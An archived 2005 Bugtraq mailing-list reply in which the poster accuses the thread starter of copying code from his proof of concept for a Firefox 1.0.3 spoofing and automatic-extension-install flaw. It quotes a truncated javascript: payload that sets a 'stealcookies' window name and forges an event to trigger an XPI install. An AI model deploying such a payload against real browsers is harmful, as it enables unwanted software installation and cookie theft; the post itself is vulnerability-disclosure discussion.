[38782] in bugtraq

home help back first fref pref prev next nref lref last post

Re: firefox 1.0.3 spoof+auto dl

daemon@ATHENA.MIT.EDU (Paul)
Mon May 9 15:21:36 2005

Date: 8 May 2005 13:01:48 -0000
Message-ID: <20050508130148.30603.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Paul <paul@greyhats.cjb.net>
To: bugtraq@securityfocus.com

In-Reply-To: <20050507173037.20610.qmail@www.securityfocus.com>

This is the copy of my PoC. The person responsible for the leak of my remote compromise is the starter of this thread. In fact, he copies some of the code directly from my PoC:

javascript:'<noscript>'+eval('if (window.name!=\'stealcookies\'){window.name=\'stealcookies\';}  else{ event={target:{href:\'http://ftp.mozilla.org/pub/mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'}};install(event,\'You are vulnerable!!!

That is the window name, object creater, even direct string copies from my site. This guy is incredible.

Paul

home help back first fref pref prev next nref lref last post